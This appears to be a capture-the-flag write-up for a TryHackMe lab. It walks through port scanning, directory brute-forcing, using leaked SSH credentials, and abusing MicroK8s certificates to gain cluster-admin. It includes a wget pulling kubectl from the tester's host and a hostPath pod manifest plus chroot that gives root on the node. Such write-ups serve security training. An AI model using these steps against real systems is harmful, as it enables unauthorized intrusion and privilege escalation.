Learn how the misconfiguration of containers can lead to opportunities for some and disasters for others.

https://tryhackme.com/room/frankandherby

nmap -T4 10.10.51.121
# Host is up (0.096s latency).
# Not shown: 999 closed tcp ports (conn-refused)
# PORT   STATE SERVICE
# 22/tcp open  ssh

We expect another port serving the webpage (the answer format shows 5 characters).

nmap -T5 -p- 10.10.51.121
# Discovered open port 22/tcp on 10.10.51.121
# Discovered open port 10259/tcp on 10.10.51.121
# Discovered open port 10257/tcp on 10.10.51.121
# Discovered open port 3000/tcp on 10.10.51.121
# Discovered open port 25000/tcp on 10.10.51.121
# Discovered open port 3XXXX/tcp on 10.10.51.121

The port falls within the Kubernetes NodePort range (30000-32767).
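If you want to home in on that range faster on a rescan, you can sweep just the NodePort ports (a quick sketch):

nmap -T4 -p 30000-32767 10.10.51.121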

Going to that port on the instance, we find the following webpage.

[Screenshot: the webpage served on the NodePort]

Let's run through all the possible directories on the webserver, using Gobuster for the brute force.

I’m running this from a Docker container, so I have to set everything up first.

docker run -it --rm -p 8080:8080 ubuntu bash
apt update
apt install -y wget
cd ~
wget https://github.com/OJ/gobuster/releases/download/v3.6.0/gobuster_Linux_arm64.tar.gz
tar xfv gobuster_Linux_arm64.tar.gz

./gobuster version
# 3.6

We need a wordlist of paths to check first.

wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/common.txt

./gobuster dir -u http://10.10.51.121:3XXXX/ -w ~/common.txt -n
# /assets               [Size: 169] [--> http://10.10.51.121/assets/]
# /css                  [Size: 169] [--> http://10.10.51.121/css/]
# /index.html           [Size: 4795]
# /vendor               [Size: 169] [--> http://10.10.51.121/vendor/]

# A larger one...
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/big.txt

./gobuster dir -u http://10.10.51.121:3XXXX/ -w ~/big.txt
# No Change

# Even more...
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/dirsearch.txt
./gobuster dir -u http://10.10.51.121:3XXXX/ -w ~/dirsearch.txt
# /%2e%2e//google.com   (Status: 400) [Size: 157]
# /.                    (Status: 200) [Size: 4795]
# /.XXXXXXXXXXXXXXX     (Status: 200) [Size: 50]

Let's see what's in that /.XXXXXXXXXXXXXXX file.

wget http://10.10.51.121:3XXXX/.XXXXXXXXXXXXXXX

cat .XXXXXXXXXXXXXXX
# http://frank:[email protected]

Decoding the string we get http://frank:[email protected]
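Assuming the string is base64-encoded, decoding it is a one-liner:

base64 -d .XXXXXXXXXXXXXXX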

These look like login credentials; let's try them over SSH.

ssh [email protected]
# frank@dev-01:~$

ls -l
# drwxrwxr-x 3 frank frank 4096 Oct 27  2021 repos
# drwxr-xr-x 3 frank frank 4096 Oct 10  2021 snap
# -rw-rw-r-- 1 frank frank   17 Oct 29  2021 user.txt

cat user.txt
# THM{}

Knowing the challenge is about MicroK8s, let's see what that's about.

which microk8s
# /snap/bin/microk8s

ls -l /snap/bin/microk8s
# lrwxrwxrwx 1 root root 13 Oct  3  2021 /snap/bin/microk8s -> /usr/bin/snap

id
# uid=1001(frank) gid=1001(frank) groups=1001(frank),998(microk8s)
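Note the microk8s group: on MicroK8s installs, members of that group can usually drive the bundled kubectl through the snap without sudo, so that alone is worth probing (a sketch; the rest of this writeup goes through the certs instead):

microk8s kubectl get nodes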

microk8s inspect
# [sudo] password for frank:

Don’t have sudo permissions…

Maybe the package is vulnerable to something

snap list microk8s
# Name      Version  Rev   Tracking     Publisher   Notes
# microk8s  v1.21.5  2546  1.21/stable  canonical✓  classic

Nothing obvious there. How about running processes?

ps aux | grep microk8s
# python3 /snap/microk8s/2546/usr/bin/gunicorn3 cluster.agent:app --bind 0.0.0.0:25000 --keyfile /var/snap/microk8s/2546/certs/server.key --certfile /var/snap/microk8s/2546/certs/server.crt --timeout 240

That's a key and certificate file; maybe we can use them to authenticate against the Kubernetes API…
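Those paths come straight from the process list; it's worth checking that frank can actually read them before trying to use them:

ls -l /var/snap/microk8s/2546/certs/server.crt /var/snap/microk8s/2546/certs/server.key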

ss -tulpn
# .......

We don't see the default API server port (6443). Looking at the MicroK8s docs, the API server runs on 16443 instead, and that port is listening!
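A quick way to confirm the API server is what's answering there (a sketch; -k because the cert won't be trusted):

curl -sk https://127.0.0.1:16443/version
# an apiserver answers with JSON; a 401/403 status object for anonymous requests is still a good sign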

Let's get a kubectl binary onto the machine! My machine died…

From our local machine, download the kubectl binary and serve it with a Python webserver.

curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
python3 -m http.server 9000 -d .
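Optionally, verify the download against the published checksum before serving it (this mirrors the upstream kubectl install docs):

curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl.sha256"
echo "$(cat kubectl.sha256)  kubectl" | sha256sum --check
# expect: kubectl: OK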

Back in the SSH session:

wget http://10.6.93.142:9000/kubectl
chmod +x kubectl
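Quick sanity check that the binary actually runs on the target:

./kubectl version --client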

./kubectl auth can-i --list --client-certificate=/var/snap/microk8s/2546/certs/server.crt --client-key=/var/snap/microk8s/2546/certs/server.key --server https://127.0.0.1:16443 --insecure-skip-tls-verify
# Resources   Non-Resource URLs   Resource Names   Verbs
# *.*         []                  []               [*]
#             [*]                 []               [*]
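That wildcard row (every resource, every verb) means these credentials are effectively cluster-admin. A spot check, if you want one (sketch):

./kubectl auth can-i create pods -A --client-certificate=/var/snap/microk8s/2546/certs/server.crt --client-key=/var/snap/microk8s/2546/certs/server.key --server https://127.0.0.1:16443 --insecure-skip-tls-verify
# expect: yes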

While poking around I also found an entire kubeconfig (/var/snap/microk8s/2546/credentials/client.config), which gives full cluster access.
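To save retyping the flag on every command, you can point KUBECONFIG at that file instead (optional):

export KUBECONFIG=/var/snap/microk8s/2546/credentials/client.config
./kubectl get nodes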

Let's see if there are any secrets in the cluster; probably not, but it doesn't hurt to check.

./kubectl --kubeconfig /var/snap/microk8s/2546/credentials/client.config get nodes
# dev-01   Ready    <none>   2y109d   v1.21.5-3+83e2bb7ee39726

./kubectl --kubeconfig /var/snap/microk8s/2546/credentials/client.config get all -A
./kubectl --kubeconfig /var/snap/microk8s/2546/credentials/client.config get secrets -A

Neither turns up much. Let's get access to the node itself by scheduling a pod that mounts the host's root filesystem via hostPath:

apiVersion: v1
kind: Pod
metadata:
  name: hostmount
spec:
  containers:
  - name: shell
    image: localhost:32000/bsnginx   # same image the already-running nginx pod uses
    command:
      - "/bin/bash"
      - "-c"
      - "sleep 10000"                # keep the container alive so we can exec into it
    volumeMounts:
      - name: root
        mountPath: /host             # the node's filesystem shows up here inside the pod
  volumes:
  - name: root
    hostPath:
      path: /                        # mount the node's root filesystem
      type: Directory

Put this in a file on the machine called pod.yaml. The image comes from an already-running container (nginx-deployment-7b548976fd-77v4r).
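If you want to confirm which image that pod runs before reusing it, jsonpath does it (a sketch; add -n <namespace> if the pod isn't in default):

./kubectl --kubeconfig /var/snap/microk8s/2546/credentials/client.config get pod nginx-deployment-7b548976fd-77v4r -o jsonpath='{.spec.containers[*].image}'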

./kubectl --kubeconfig /var/snap/microk8s/2546/credentials/client.config apply -f pod.yaml

./kubectl --kubeconfig /var/snap/microk8s/2546/credentials/client.config exec -it hostmount -- bash
# root@hostmount:/#

ls /host
# bin  boot  cdrom  dev  etc  home  lib  lib32  lib64  libx32  lost+found  media	mnt  opt  proc	root  run  sbin  snap  srv  sys  tmp  usr  var
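Reading files through /host is enough for the flag, but you can also chroot into the mounted filesystem for a full root shell on the node:

chroot /host /bin/bash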

ls /host/root
# root.txt  snap

cat /host/root/root.txt
# THM{}